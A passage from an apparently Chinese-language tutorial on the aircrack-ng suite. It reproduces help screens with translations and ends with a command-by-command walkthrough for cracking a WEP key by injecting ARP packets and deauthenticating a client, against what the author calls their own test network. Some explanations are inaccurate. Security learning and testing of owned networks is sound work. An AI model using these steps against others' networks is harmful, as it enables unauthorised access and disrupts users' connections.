  4.   http://www.aircrack-ng.org  
  5.   
  6.   Usage: buddy-ng <options>  
  7.   
  8.   选项:  
  9.   
  10.        -h        : 显示帮助  
  11.        -p        : 不要删除权限  
root@kali:~# buddy-ng -h

  Buddy-ng 1.2 beta3 - (C) 2007,2008 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: buddy-ng <options>

  选项:

       -h        : 显示帮助
       -p        : 不要删除权限复制代码


16、easside-ng  – 一种自动魔法工具,允许您通过WEP加密的接入点进行通信

[html] view plain copy print ?
  1. root@kali:~# easside-ng -h  
  2.   
  3.   Easside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   Usage: easside-ng <options>  
  7.   
  8.   Options:  
  9.   
  10.        -h                : This help screen  
  11.        -v   <victim mac> : Victim BSSID  
  12.        -m      <src mac> : Source MAC address  
  13.        -i           <ip> : Source IP address  
  14.        -r    <router ip> : Router IP address  
  15.        -s     <buddy ip> : Buddy-ng IP address (mandatory)  
  16.        -f        <iface> : Interface to use (mandatory)  
  17.        -c      <channel> : Lock card to this channel  
  18.        -n                : Determine Internet IP only  
root@kali:~# easside-ng -h

  Easside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: easside-ng <options>

  Options:

       -h                : This help screen
       -v   <victim mac> : Victim BSSID
       -m      <src mac> : Source MAC address
       -i           <ip> : Source IP address
       -r    <router ip> : Router IP address
       -s     <buddy ip> : Buddy-ng IP address (mandatory)
       -f        <iface> : Interface to use (mandatory)
       -c      <channel> : Lock card to this channel
       -n                : Determine Internet IP only复制代码
中文对照版:

[html] view plain copy print ?
  1. root@kali:~# easside-ng -h  
  2.   
  3.   Easside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   Usage: easside-ng <options>  
  7.   
  8.   Options:  
  9.   
  10.        -h                : 显示帮助  
  11.        -v   <victim mac> : 受害者BSSID  
  12.        -m      <src mac> : 源MAC地址  
  13.        -i           <ip> : 源IP地址  
  14.        -r    <router ip> : 路由器IP地址  
  15.        -s     <buddy ip> : 好友地址 (强制性)  
  16.        -f        <iface> : 使用界面 (强制性)  
  17.        -c      <channel> : 将卡锁定到此通道  
  18.        -n                : 仅确定Internet IP  
root@kali:~# easside-ng -h

  Easside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: easside-ng <options>

  Options:

       -h                : 显示帮助
       -v   <victim mac> : 受害者BSSID
       -m      <src mac> : 源MAC地址
       -i           <ip> : 源IP地址
       -r    <router ip> : 路由器IP地址
       -s     <buddy ip> : 好友地址 (强制性)
       -f        <iface> : 使用界面 (强制性)
       -c      <channel> : 将卡锁定到此通道
       -n                : 仅确定Internet IP复制代码
17、ivstools – 这个工具句柄.ivs文件.您可以合并或转换它们。

[html] view plain copy print ?
  1. root@kali:~# ivstools  
  2.   
  3.   ivsTools 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.    usage: ivstools --convert <pcap file> < ivs output file>  
  7.         Extract ivs from a pcap file  
  8.        ivstools --merge <ivs file 1>  <ivs file 2> .. <output file >  
  9.         Merge ivs files  
root@kali:~# ivstools

  ivsTools 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

   usage: ivstools --convert <pcap file> <ivs output file>
        Extract ivs from a pcap file
       ivstools --merge <ivs file 1> <ivs file 2> .. <output file>
        Merge ivs files复制代码
中文对照版:
[html] view plain copy print ?
  1. root@kali:~# ivstools  
  2.   
  3.   ivsTools 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.    usage: ivstools --convert <pcap file> < ivs output file>  
  7.         从pcap文件中提取ivs  
  8.        ivstools --merge <ivs file 1>  <ivs file 2> .. <output file >  
  9.         合并ivs文件  
root@kali:~# ivstools

  ivsTools 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

   usage: ivstools --convert <pcap file> <ivs output file>
        从pcap文件中提取ivs
       ivstools --merge <ivs file 1> <ivs file 2> .. <output file>
        合并ivs文件复制代码


18、kstats
[html] view plain copy print ?
  1. root@kali:~# kstats  
  2. usage: kstats <ivs file> <104-bit key >  
root@kali:~# kstats
usage: kstats <ivs file> <104-bit key>复制代码

19、makeivs-ng – 生成初始化向量

[html] view plain copy print?
  1. root@kali:~# makeivs-ng --help  
  2.   
  3.   makeivs-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: makeivs-ng [options]  
  7.   
  8.   Common options:  
  9.       -b <bssid> : Set access point MAC address  
  10.       -f <num>   : Number of first IV  
  11.       -k <key>   : Target network WEP key in hex  
  12.       -s <num>   : Seed used to setup random generator  
  13.       -w <file>  : Filename to write IVs into  
  14.       -c <num>   : Number of IVs to generate  
  15.       -d <num>   : Percentage of dupe IVs  
  16.       -e <num>   : Percentage of erroneous keystreams  
  17.       -l <num>   : Length of keystreams  
  18.       -n         : Ignores ignores weak IVs  
  19.       -p         : Uses prng algorithm to generate IVs  
  20.   
  21.       --help     : Displays this usage screen  
root@kali:~# makeivs-ng --help

  makeivs-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: makeivs-ng [options]

  Common options:
      -b <bssid> : Set access point MAC address
      -f <num>   : Number of first IV
      -k <key>   : Target network WEP key in hex
      -s <num>   : Seed used to setup random generator
      -w <file>  : Filename to write IVs into
      -c <num>   : Number of IVs to generate
      -d <num>   : Percentage of dupe IVs
      -e <num>   : Percentage of erroneous keystreams
      -l <num>   : Length of keystreams
      -n         : Ignores ignores weak IVs
      -p         : Uses prng algorithm to generate IVs

      --help     : Displays this usage screen复制代码

中文对照版:

[html] view plain copy print?
  1. root@kali:~# makeivs-ng --help  
  2.   
  3.   makeivs-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: makeivs-ng [options]  
  7.   
  8.   常用选项:  
  9.       -b <bssid> : 设置接入点MAC地址  
  10.       -f <num>   : Number of first IV 第IV号  
  11.       -k <key>   : 目标网络WEP密钥为十六进制  
  12.       -s <num>   : 种子用于设置随机发生器  
  13.       -w <file>  : 将文件名写入  
  14.       -c <num>   : 产生的IV数  
  15.       -d <num>   : Percentage of dupe IVs 重复数据删除工具变量的百分比  
  16.       -e <num>   : 错误密钥流的百分比  
  17.       -l <num>   : 密钥流长度  
  18.       -n         : 忽略忽略弱IV  
  19.       -p         : 使用prng算法生成IV  
  20.   
  21.       --help     : 显示帮助  
root@kali:~# makeivs-ng --help

  makeivs-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: makeivs-ng [options]

  常用选项:
      -b <bssid> : 设置接入点MAC地址
      -f <num>   : Number of first IV 第IV号
      -k <key>   : 目标网络WEP密钥为十六进制
      -s <num>   : 种子用于设置随机发生器
      -w <file>  : 将文件名写入
      -c <num>   : 产生的IV数
      -d <num>   : Percentage of dupe IVs 重复数据删除工具变量的百分比
      -e <num>   : 错误密钥流的百分比
      -l <num>   : 密钥流长度
      -n         : 忽略忽略弱IV
      -p         : 使用prng算法生成IV

      --help     : 显示帮助复制代码
20、packetforge-ng – 创建可随后用于注入的加密数据包 [html] view plain copy print?
  1. root@kali:~# packetforge-ng --help  
  2.   
  3.   Packetforge-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   Original work: Martin Beck  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   Usage: packetforge-ng <mode> <options >  
  8.   
  9.   Forge options:  
  10.   
  11.       -p <fctrl>     : set frame control word (hex)  
  12.       -a <bssid>     : set Access Point MAC address  
  13.       -c <dmac>      : set Destination  MAC address  
  14.       -h <smac>      : set Source       MAC address  
  15.       -j             : set FromDS bit  
  16.       -o             : clear ToDS bit  
  17.       -e             : disables WEP encryption  
  18.       -k <ip[:port]> : set Destination IP [Port]  
  19.       -l <ip[:port]> : set Source      IP [Port]  
  20.       -t ttl         : set Time To Live  
  21.       -w <file>      : write packet to this pcap file  
  22.       -s <size>      : specify size of null packet  
  23.       -n <packets>   : set number of packets to generate  
  24.   
  25.   Source options:  
  26.   
  27.       -r <file>      : read packet from this raw file  
  28.       -y <file>      : read PRGA from this file  
  29.   
  30.   Modes:  
  31.   
  32.       --arp          : forge an ARP packet    (-0)  
  33.       --udp          : forge an UDP packet    (-1)  
  34.       --icmp         : forge an ICMP packet   (-2)  
  35.       --null         : build a null packet    (-3)  
  36.       --custom       : build a custom packet  (-9)  
  37.   
  38.       --help         : Displays this usage screen  
root@kali:~# packetforge-ng --help

  Packetforge-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  Original work: Martin Beck
  http://www.aircrack-ng.org

  Usage: packetforge-ng <mode> <options>

  Forge options:

      -p <fctrl>     : set frame control word (hex)
      -a <bssid>     : set Access Point MAC address
      -c <dmac>      : set Destination  MAC address
      -h <smac>      : set Source       MAC address
      -j             : set FromDS bit
      -o             : clear ToDS bit
      -e             : disables WEP encryption
      -k <ip[:port]> : set Destination IP [Port]
      -l <ip[:port]> : set Source      IP [Port]
      -t ttl         : set Time To Live
      -w <file>      : write packet to this pcap file
      -s <size>      : specify size of null packet
      -n <packets>   : set number of packets to generate

  Source options:

      -r <file>      : read packet from this raw file
      -y <file>      : read PRGA from this file

  Modes:

      --arp          : forge an ARP packet    (-0)
      --udp          : forge an UDP packet    (-1)
      --icmp         : forge an ICMP packet   (-2)
      --null         : build a null packet    (-3)
      --custom       : build a custom packet  (-9)

      --help         : Displays this usage screen复制代码


中文对照版:

[html] view plain copy print?
  1. root@kali:~# packetforge-ng --help  
  2.   
  3.   Packetforge-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   Original work: Martin Beck  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   Usage: packetforge-ng <mode> <options >  
  8.   
  9.   伪造的选项:  
  10.   
  11.       -p <fctrl>     : 设置帧控制字 (hex)  
  12.       -a <bssid>     : 设置接入点MAC地址  
  13.       -c <dmac>      : 设置目的MAC地址  
  14.       -h <smac>      : 设置源MAC地址  
  15.       -j             : 设置FromDS位  
  16.       -o             : 清除ToDS位  
  17.       -e             : 禁用WEP加密  
  18.       -k <ip[:port]> : 设置目的IP [Port]  
  19.       -l <ip[:port]> : 设置源IP [Port]  
  20.       -t ttl         : 设置生活时间  
  21.       -w <file>      : 将数据包写入该pcap文件  
  22.       -s <size>      : 指定空数据包的大小  
  23.       -n <packets>   : 设置要生成的数据包数  
  24.   
  25.   源选项:  
  26.   
  27.       -r <file>      : 从这个原始文件读取数据包  
  28.       -y <file>      : 从这个文件读取PRGA  
  29.   
  30.   模式:  
  31.   
  32.       --arp          : 伪造ARP报文    (-0)  
  33.       --udp          : 伪造UDP数据包    (-1)  
  34.       --icmp         : 伪造ICMP数据包   (-2)  
  35.       --null         : 构建一个空数据包    (-3)  
  36.       --custom       : 构建一个自定义数据包  (-9)  
  37.   
  38.       --help         : 显示帮助  
root@kali:~# packetforge-ng --help

  Packetforge-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  Original work: Martin Beck
  http://www.aircrack-ng.org

  Usage: packetforge-ng <mode> <options>

  伪造的选项:

      -p <fctrl>     : 设置帧控制字 (hex)
      -a <bssid>     : 设置接入点MAC地址
      -c <dmac>      : 设置目的MAC地址
      -h <smac>      : 设置源MAC地址
      -j             : 设置FromDS位
      -o             : 清除ToDS位
      -e             : 禁用WEP加密
      -k <ip[:port]> : 设置目的IP [Port]
      -l <ip[:port]> : 设置源IP [Port]
      -t ttl         : 设置生活时间
      -w <file>      : 将数据包写入该pcap文件
      -s <size>      : 指定空数据包的大小
      -n <packets>   : 设置要生成的数据包数

  源选项:

      -r <file>      : 从这个原始文件读取数据包
      -y <file>      : 从这个文件读取PRGA

  模式:

      --arp          : 伪造ARP报文    (-0)
      --udp          : 伪造UDP数据包    (-1)
      --icmp         : 伪造ICMP数据包   (-2)
      --null         : 构建一个空数据包    (-3)
      --custom       : 构建一个自定义数据包  (-9)

      --help         : 显示帮助复制代码
21、tkiptun-ng – 该工具能够将几帧注入具有QoS的WPA TKIP网络

[html] view plain copy print?
  1. root@kali:~# tkiptun-ng --help  
  2.   
  3.   Tkiptun-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: tkiptun-ng <options> <replay interface >  
  7.   
  8.   Filter options:  
  9.   
  10.       -d dmac   : MAC address, Destination  
  11.       -s smac   : MAC address, Source  
  12.       -m len    : minimum packet length (default: 80)  
  13.       -n len    : maximum packet length (default: 80)  
  14.       -t tods   : frame control, To      DS bit  
  15.       -f fromds : frame control, From    DS bit  
  16.       -D        : disable AP detection  
  17.       -Z        : select packets manually  
  18.   
  19.   Replay options:  
  20.   
  21.       -x nbpps  : number of packets per second  
  22.       -a bssid  : set Access Point MAC address  
  23.       -c dmac   : set Destination  MAC address  
  24.       -h smac   : set Source       MAC address  
  25.       -e essid  : set target AP SSID  
  26.       -M sec    : MIC error timout in seconds [60]  
  27.   
  28.   Debug options:  
  29.   
  30.       -K prga   : keystream for continuation  
  31.       -y file   : keystream-file for continuation  
  32.       -j        : inject FromDS packets  
  33.       -P pmk    : pmk for verification/vuln testing  
  34.       -p psk    : psk to calculate pmk with essid  
  35.   
  36.   source options:  
  37.   
  38.       -i iface  : capture packets from this interface  
  39.       -r file   : extract packets from this pcap file  
  40.   
  41.       --help              : Displays this usage screen  
root@kali:~# tkiptun-ng --help

  Tkiptun-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: tkiptun-ng <options> <replay interface>

  Filter options:

      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length (default: 80)
      -n len    : maximum packet length (default: 80)
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -D        : disable AP detection
      -Z        : select packets manually

  Replay options:

      -x nbpps  : number of packets per second
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -e essid  : set target AP SSID
      -M sec    : MIC error timout in seconds [60]

  Debug options:

      -K prga   : keystream for continuation
      -y file   : keystream-file for continuation
      -j        : inject FromDS packets
      -P pmk    : pmk for verification/vuln testing
      -p psk    : psk to calculate pmk with essid

  source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

      --help              : Displays this usage screen复制代码
中文对照版:

[html] view plain copy print?
  1. root@kali:~# tkiptun-ng --help  
  2.   
  3.   Tkiptun-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: tkiptun-ng <options> <replay interface >  
  7.   
  8.   过滤选项:  
  9.   
  10.       -d dmac   : MAC地址,目的地址  
  11.       -s smac   : MAC地址,来源  
  12.       -m len    : 最小包长度 (default: 80)  
  13.       -n len    : 最大包长度 (default: 80)  
  14.       -t tods   : 帧控制,到DS位  
  15.       -f fromds : 帧控制,从DS位  
  16.       -D        : 禁用AP检测  
  17.       -Z        : 手动选择数据包  
  18.   
  19.   重播选项:  
  20.   
  21.       -x nbpps  : 每秒数据包数  
  22.       -a bssid  : 设置接入点MAC地址  
  23.       -c dmac   : 设置目的MAC地址  
  24.       -h smac   : 设置源MAC地址  
  25.       -e essid  : 设置目标AP SSID  
  26.       -M sec    : MIC错误超时(秒)[60]  
  27.   
  28.   调试选项:  
  29.   
  30.       -K prga   : 密钥流的延续  
  31.       -y file   : 连续性的密钥文件  
  32.       -j        : 注入FromDS数据包  
  33.       -P pmk    : pmk进行验证/测试  
  34.       -p psk    : psk用essid计算pmk  
  35.   
  36.   源选项:  
  37.   
  38.       -i iface  : 从该接口捕获数据包  
  39.       -r file   : 从这个pcap文件中提取数据包  
  40.   
  41.       --help    :显示帮助   
root@kali:~# tkiptun-ng --help

  Tkiptun-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: tkiptun-ng <options> <replay interface>

  过滤选项:

      -d dmac   : MAC地址,目的地址
      -s smac   : MAC地址,来源
      -m len    : 最小包长度 (default: 80)
      -n len    : 最大包长度 (default: 80)
      -t tods   : 帧控制,到DS位
      -f fromds : 帧控制,从DS位
      -D        : 禁用AP检测
      -Z        : 手动选择数据包

  重播选项:

      -x nbpps  : 每秒数据包数
      -a bssid  : 设置接入点MAC地址
      -c dmac   : 设置目的MAC地址
      -h smac   : 设置源MAC地址
      -e essid  : 设置目标AP SSID
      -M sec    : MIC错误超时(秒)[60]

  调试选项:

      -K prga   : 密钥流的延续
      -y file   : 连续性的密钥文件
      -j        : 注入FromDS数据包
      -P pmk    : pmk进行验证/测试
      -p psk    : psk用essid计算pmk

  源选项:

      -i iface  : 从该接口捕获数据包
      -r file   : 从这个pcap文件中提取数据包

      --help    :显示帮助 复制代码
22、wesside-ng – 自动魔法工具,融合了无数获得WEP密钥的技术 [html] view plain copy print?
  1. root@kali:~# wesside-ng -h  
  2.   
  3.   Wesside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   Usage: wesside-ng <options>  
  7.   
  8.   Options:  
  9.   
  10.        -h              : This help screen  
  11.        -i      <iface> : Interface to use (mandatory)  
  12.        -m      <my ip> : My IP address  
  13.        -n     <net ip> : Network IP address  
  14.        -a      <mymac> : Source MAC Address  
  15.        -c              : Do not crack the key  
  16.        -p   <min prga> : Minimum bytes of PRGA to gather  
  17.        -v <victim mac> : Victim BSSID  
  18.        -t  <threshold> : Cracking threshold  
  19.        -f   <max chan> : Highest scanned chan (default: 11)  
  20.        -k      <txnum> : Ignore acks and tx txnum times  
root@kali:~# wesside-ng -h

  Wesside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: wesside-ng <options>

  Options:

       -h              : This help screen
       -i      <iface> : Interface to use (mandatory)
       -m      <my ip> : My IP address
       -n     <net ip> : Network IP address
       -a      <mymac> : Source MAC Address
       -c              : Do not crack the key
       -p   <min prga> : Minimum bytes of PRGA to gather
       -v <victim mac> : Victim BSSID
       -t  <threshold> : Cracking threshold
       -f   <max chan> : Highest scanned chan (default: 11)
       -k      <txnum> : Ignore acks and tx txnum times复制代码
中文对照版:
[html] view plain copy print?
  1. root@kali:~# wesside-ng -h  
  2.   
  3.   Wesside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   Usage: wesside-ng <options>  
  7.   
  8.   选项:  
  9.   
  10.        -h              : 显示帮助  
  11.        -i      <iface> : 使用界面 (强制性)  
  12.        -m      <my ip> : 我的IP地址  
  13.        -n     <net ip> : 网络IP地址  
  14.        -a      <mymac> : 源MAC地址  
  15.        -c              : 不要破解钥匙  
  16.        -p   <min prga> : PRGA的最小字节收集  
  17.        -v <victim mac> : 受害者BSSID  
  18.        -t  <threshold> : Cracking threshold 破裂门槛  
  19.        -f   <max chan> : 最高扫描 (default: 11)  
  20.        -k      <txnum> : Ignore acks and tx txnum times 忽略ack和tx txnum次  
root@kali:~# wesside-ng -h

  Wesside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: wesside-ng <options>

  选项:

       -h              : 显示帮助
       -i      <iface> : 使用界面 (强制性)
       -m      <my ip> : 我的IP地址
       -n     <net ip> : 网络IP地址
       -a      <mymac> : 源MAC地址
       -c              : 不要破解钥匙
       -p   <min prga> : PRGA的最小字节收集
       -v <victim mac> : 受害者BSSID
       -t  <threshold> : Cracking threshold 破裂门槛
       -f   <max chan> : 最高扫描 (default: 11)
       -k      <txnum> : Ignore acks and tx txnum times 忽略ack和tx txnum次复制代码

23、wpaclean – 从pcap文件中删除多余的数据

[html] view plain copy print?
  1. root@kali:~# wpaclean  
  2. Usage: wpaclean <out.cap> <in.cap > [in2.cap] [...]  
root@kali:~# wpaclean
Usage: wpaclean <out.cap> <in.cap> [in2.cap] [...]复制代码


三、示例


airdriver-ng 使用示例

[html] view plain copy print?
  1. root@kali:~# airdriver-ng detect  
  2.   
  3. USB devices (generic detection):  
  4. Bus 002 Device 009: ID 0846:9001 NetGear, Inc. WN111(v2) RangeMax Next Wireless [Atheros AR9170+AR9101]  
  5. Bus 001 Device 012: ID 050d:0017 Belkin Components B8T017 Bluetooth+EDR 2.1  
  6. Bus 001 Device 005: ID 0e0f:0008 VMware, Inc.  
root@kali:~# airdriver-ng detect

USB devices (generic detection):
Bus 002 Device 009: ID 0846:9001 NetGear, Inc. WN111(v2) RangeMax Next Wireless [Atheros AR9170+AR9101]
Bus 001 Device 012: ID 050d:0017 Belkin Components B8T017 Bluetooth+EDR 2.1
Bus 001 Device 005: ID 0e0f:0008 VMware, Inc.复制代码
airmon-ng 使用示例


所需通道上无线接口(wlan0)上的启动(启动)监视模式(6):

[html] view plain copy print?
  1. root@kali:~# airmon-ng start wlan0 6  
  2.   
  3.   
  4. Interface   Chipset     Driver  
  5.   
  6. wlan0       2-2: Atheros    carl9170 - [phy4]  
  7.                 (monitor mode enabled on mon0)  
root@kali:~# airmon-ng start wlan0 6


Interface   Chipset     Driver

wlan0       2-2: Atheros    carl9170 - [phy4]
                (monitor mode enabled on mon0)复制代码

airodump-ng 使用示例

使用监视器模式界面(mon0),将通道6(-c 6)上的嗅探器(BSSID)(-bssid 38:60:77:23:B1:CB)进行过滤,将捕获写入磁盘(-w capture):

[html] view plain copy print?
  1. root@kali:~# airodump-ng -c 6 --bssid 38:60:77:23:B1:CB -w capture mon0  
  2.  CH  6 ][ Elapsed: 4 s ][ 2014-05-15 17:21                                           
  3.                                                                                                                                                              
  4.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  
  5.                                                                                                                                                              
  6.  38:60:77:23:B1:CB  -79   0        7        0    0   6  54e  WPA2 CCMP   PSK  6EA10E                                                                         
  7.                                                                                                                                                              
  8.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe  
root@kali:~# airodump-ng -c 6 --bssid 38:60:77:23:B1:CB -w capture mon0
 CH  6 ][ Elapsed: 4 s ][ 2014-05-15 17:21                                         
                                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                           
 38:60:77:23:B1:CB  -79   0        7        0    0   6  54e  WPA2 CCMP   PSK  6EA10E                                                                       
                                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe复制代码


aircrack-ng 使用示例
使用提供的词库(-w /usr/share/wordlists/nmap.lst)尝试破解捕获文件(capture-01.cap)中的密码:
[html] view plain copy print?
  1. root@kali:~# aircrack-ng -w /usr/share/wordlists/nmap.lst capture-01.cap   
  2. Opening capture-01.cap  
  3. Read 2 packets.  
  4.   
  5.    #  BSSID              ESSID                     Encryption  
  6.   
  7.    1  38:60:77:23:B1:CB  6EA10E                    No data - WEP or WPA  
  8.   
  9. Choosing first network as target.  
  10.   
  11. Opening capture-01.cap  
root@kali:~# aircrack-ng -w /usr/share/wordlists/nmap.lst capture-01.cap 
Opening capture-01.cap
Read 2 packets.

   #  BSSID              ESSID                     Encryption

   1  38:60:77:23:B1:CB  6EA10E                    No data - WEP or WPA

Choosing first network as target.

Opening capture-01.cap复制代码



四、实战Aircrack-ng破解WEB加密

Aircark-ng工具包简单介绍:
aircrack-ng 破解 airmon-ng 改变网卡工作模式(启动监听模式) airodump-ng 捕获报文 aireplay-ng 提供各种攻击,为airodump-ng创造更多的报文 airserv-ng 网卡连接到指定端口,可用来做无线跳板 airolib-ng 彩虹表破解创建数据库文件 airdecap-ng 解包

先查看下网卡信息:


[html] view plain copy print?
  1. root@kali:~# ifconfig  
root@kali:~# ifconfig
复制代码


然后监听网卡


[html] view plain copy print?
  1. root@kali:~# airmon-ng start wlan0  
root@kali:~# airmon-ng start wlan0
复制代码


然后扫描附近WIFI,找到一个采用WEP加密的wifi,这个wifi是我用来测试用的

[html] view plain copy print?
  1. root@kali:~# airodump-ng wlan0mon  
root@kali:~# airodump-ng wlan0mon复制代码



然后执行下面的命令

格式为: 其中-c是上面对应的信道,--ignore-negative-on是将 WPA 握手包替换为固定的频道信息

airodump-ng -c [channel] --bssid [ap's mac] -w [保存的文件名]  wlan0mon --ignore-negative-on

[html] view plain copy print?
  1. root@kali:~# airodump-ng -c 6 -w wse --ivs --bssid EC:88:8F:F5:9C:20 wlan0mon  
root@kali:~# airodump-ng -c 6 -w wse --ivs --bssid EC:88:8F:F5:9C:20 wlan0mon
复制代码



各参数介绍:

BSSID AP的MAC
PWR 信号强度
Beacons 无线ap发的通知 周期发送
#Data 抓到的数据包
CH channel 信道
MB 数字表示最大传输速率(网络标准),e表示802.11e
,"."表示短前导码。


注:前导码是数据包的一组比特组,用来让接受者同步
并准备接受实际的数据

ENC 加密方式
CIPHER 加密算法 WPA-TKIP WPA2-CCMP
AUTH 认证MGT PSK OPN开放 pre-shared key
ESSID 通俗之wifi名字<length:8>这样的表示未广播


STATION 客户端
RATE 传输率 比如300M无线路由器
Lost 最近的10秒内的丢失包数 seq tcp
frames 来自客户端的数据包
Probe 主动探测

开始攻击


[html] view plain copy print?
  1. root@kali:~# aireplay-ng -3 -b EC:88:8F:F5:9C:20 -h A4:44:D1:1B:D2:85 wlan0mon  
root@kali:~# aireplay-ng -3 -b EC:88:8F:F5:9C:20 -h A4:44:D1:1B:D2:85 wlan0mon复制代码



然后用以下命令是上面的客户端下线,让他从新连接,

aireplay-ng -0 10 -a [ap's mac] -c [客户端 mac] --ignore-negative-on wlan0mon


[html] view plain copy print?
  1. root@kali:~# aireplay-ng -0 19 -a EC:88:8F:F5:9C:20 -c A4:44:D1:1B:D2:85 wlan0mon  
root@kali:~# aireplay-ng -0 19 -a EC:88:8F:F5:9C:20 -c A4:44:D1:1B:D2:85 wlan0mon
复制代码



然后等客户端从新连接上这个wifi,只要有客户端一连接这个wifi,aireplay-ng就开始破解了




然后观察#Data与Frames这两个数据包,当他们到达一定的数量就可以,破解密码了




然后启动aircrack-ng开始破解密码


[html] view plain copy print?
  1. root@kali:~# aircrack-ng wse-01.ivs   
root@kali:~# aircrack-ng wse-01.ivs 复制代码




密码成功被破解出来!!!

其中: IVS越大越能提高破解密码的成功率。

收藏成功!
已添加到「」, 点击更改